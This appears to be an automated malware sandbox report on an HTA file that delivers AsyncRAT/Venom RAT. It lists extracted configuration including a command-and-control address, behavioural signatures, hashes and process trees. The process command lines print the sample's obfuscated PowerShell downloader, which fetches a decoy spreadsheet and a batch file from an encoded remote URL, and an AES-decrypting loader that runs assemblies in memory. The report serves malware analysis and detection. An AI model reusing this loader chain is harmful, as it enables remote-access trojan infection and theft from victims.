Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17-04-2024 01:33
Static task
static1
Behavioral task
behavioral1
Sample
609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta
Resource
win7-20240221-en
General
-
Target
609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta
-
Size
12KB
-
MD5
a76519720925437e61593d697c22d2c3
-
SHA1
fd9e658d262708c746854082d8a00e9ff998ff95
-
SHA256
609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61
-
SHA512
8be920887fde3b309df0740568840254230990a0d26ae09340a37beafccaebe5b74f9feb776d0cfbcac13b40591892319d4bf2756cbb64d66e187b7483e9a71d
-
SSDEEP
384:OSJ6w3wSSkOLjX30OxjnPC/0OOjHhw/SFfJ+RATJcJ/A4B4/JdNOJitAJ8tluNVe:OSJxgSoLjX3NxjnPC/NOjHhw/S9J+RAL
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
194.48.251.169:4449
wmdekgrrot
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/4600-125-0x0000000007320000-0x0000000007338000-memory.dmp family_asyncrat -
Detects executables attemping to enumerate video devices using WMI 1 IoCs
resource yara_rule behavioral2/memory/4600-125-0x0000000007320000-0x0000000007338000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Blocklisted process makes network request 3 IoCs
flow pid Process 13 936 powershell.exe 14 936 powershell.exe 30 4600 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1020 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 936 powershell.exe 936 powershell.exe 4600 powershell.exe 4600 powershell.exe 216 powershell.exe 216 powershell.exe 4600 powershell.exe 4600 powershell.exe 4600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeDebugPrivilege 216 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 1020 EXCEL.EXE 4600 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 968 wrote to memory of 936 968 mshta.exe 84 PID 968 wrote to memory of 936 968 mshta.exe 84 PID 968 wrote to memory of 936 968 mshta.exe 84 PID 936 wrote to memory of 1020 936 powershell.exe 86 PID 936 wrote to memory of 1020 936 powershell.exe 86 PID 936 wrote to memory of 1020 936 powershell.exe 86 PID 936 wrote to memory of 2636 936 powershell.exe 90 PID 936 wrote to memory of 2636 936 powershell.exe 90 PID 936 wrote to memory of 2636 936 powershell.exe 90 PID 2636 wrote to memory of 3676 2636 cmd.exe 92 PID 2636 wrote to memory of 3676 2636 cmd.exe 92 PID 2636 wrote to memory of 3676 2636 cmd.exe 92 PID 3676 wrote to memory of 3104 3676 cmd.exe 94 PID 3676 wrote to memory of 3104 3676 cmd.exe 94 PID 3676 wrote to memory of 3104 3676 cmd.exe 94 PID 3676 wrote to memory of 4600 3676 cmd.exe 95 PID 3676 wrote to memory of 4600 3676 cmd.exe 95 PID 3676 wrote to memory of 4600 3676 cmd.exe 95 PID 4600 wrote to memory of 216 4600 powershell.exe 96 PID 4600 wrote to memory of 216 4600 powershell.exe 96 PID 4600 wrote to memory of 216 4600 powershell.exe 96
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tNWGEJMu($ULFEPiGhOl, $hAwOwjHZ){[IO.File]::WriteAllBytes($ULFEPiGhOl, $hAwOwjHZ)};function PGKDesLMcrTbG($ULFEPiGhOl){if($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69334,69342,69342))) -eq $True){rundll32.exe $ULFEPiGhOl }elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69346,69349,69283))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ULFEPiGhOl}elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69343,69349,69339))) -eq $True){misexec /qn /i $ULFEPiGhOl}else{Start-Process $ULFEPiGhOl}};function oUMxzMjfRmyfuF($kRhMsCFPNneuPI){$bAYnlERprgsydxZhcb = New-Object (nknmvKToK @(69312,69335,69350,69280,69321,69335,69332,69301,69342,69339,69335,69344,69350));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hAwOwjHZ = $bAYnlERprgsydxZhcb.DownloadData($kRhMsCFPNneuPI);return $hAwOwjHZ};function nknmvKToK($seDVN){$yalEZGZTFwbDQOL=69234;$tpnuZBTtZIpg=$Null;foreach($KCBlEGmaNzzs in $seDVN){$tpnuZBTtZIpg+=[char]($KCBlEGmaNzzs-$yalEZGZTFwbDQOL)};return $tpnuZBTtZIpg};function jSMnCBtJT(){$RhDqJvMegLwjZOQ = $env:AppData + '\';$rQGmlBDswBs = $RhDqJvMegLwjZOQ + 'dbx.xlsx';If(Test-Path -Path $rQGmlBDswBs){Invoke-Item $rQGmlBDswBs;}Else{ $NvyoXyonhCMUvEQanD = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69334,69332,69354,69280,69354,69342,69349,69354));tNWGEJMu $rQGmlBDswBs $NvyoXyonhCMUvEQanD;Invoke-Item $rQGmlBDswBs;};$vILiVqGF = $RhDqJvMegLwjZOQ + 'gogis.bat'; if (Test-Path -Path $vILiVqGF){PGKDesLMcrTbG $vILiVqGF;}Else{ $TIaEiamfAp = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69337,69345,69337,69339,69349,69280,69332,69331,69350));tNWGEJMu $vILiVqGF $TIaEiamfAp;PGKDesLMcrTbG $vILiVqGF;};;;;}jSMnCBtJT;2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\dbx.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "5⤵PID:3104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
215B
MD52c41e5f987ddbc2091406eec26f39f41
SHA18287d92c4b188fc45b2fb245d19888a0e07a1d39
SHA2568f28fb922fe35ea0d36371ece2cdcc6bfc4f1bc571c09c63512001e7ce8f1dfa
SHA512e23acf7eb6c5ca65b4d75da8a96c593aa905090ab8126c91e2e8de78da75d63e1862166ba08e3c8ac09f6271f58261d7c437405374c58ed745820b08707c9f2a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize24B
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize847B
MD56bff128451afcbf3ada8eb47da5efaa2
SHA133c0156ad14173f606bd8e33bb41a071dbc77c33
SHA256372f00b77b029a4feab042e2f5470b9cf5db3a13e283e9e976331a7b4aaa1ec2
SHA51283f211ea56609fbe575713a715e1a403c511bf57f7ffdcb2bb7e47685e9b7d43ab8e400778c0f6781b249ceb7994e165d16d4552cac6879fb31ea4014bf058a0
-
Filesize
10KB
MD5034b9d3741bf082520555ec8b45fa875
SHA1b61bbd3d22e803cf608e1ae7e0a5a5851934db49
SHA25682bcb0ad710775944bd5d4702595abde2557a84d518d146d389ba58cc1dfcd11
SHA5128f721ff1f69eb0881a43bbb540e8adfac8bf94509038e4b5d27282457b426902586e561528329918a12d42bf5b98c4b8f17b676090508a18898ceb6f12cd4eb9
-
Filesize
6.9MB
MD5a65e873839228c5b453d6effa5d14d16
SHA140be429e0e6b41061f3291d10e720eaebf32eda1
SHA25659c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA51284ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850